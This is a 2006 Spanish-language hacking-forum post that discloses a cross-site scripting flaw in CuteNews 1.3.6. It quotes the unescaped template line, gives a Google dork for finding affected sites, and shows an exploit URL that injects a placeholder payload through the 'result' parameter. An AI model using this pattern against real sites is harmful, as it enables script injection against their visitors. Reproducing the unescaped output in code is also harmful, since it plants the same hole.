Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 04:51:48
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Cutenews 1.3.6 XSS 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Cutenews 1.3.6 XSS  (Leído 223 veces)
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« en: Diciembre 11, 2006, 06:38:25 »
 PHP Script: CuteNews 1.3.6
Class: XSS
Website:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Found by: Detefix
dork: inurl:cutenews

-----

- Vulnerable Code:

<td align=center colspan=4 style='text-align:left;'>$result</td>

-----

- Exploit:

http://[target]/[path-to-cutenews]/?result=[XSS]

-----


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

---------------------------------------------------
En el fondo es un problema del register_globalsd

saludpos
En línea





No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Cutenews 1.3.6 XSS « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC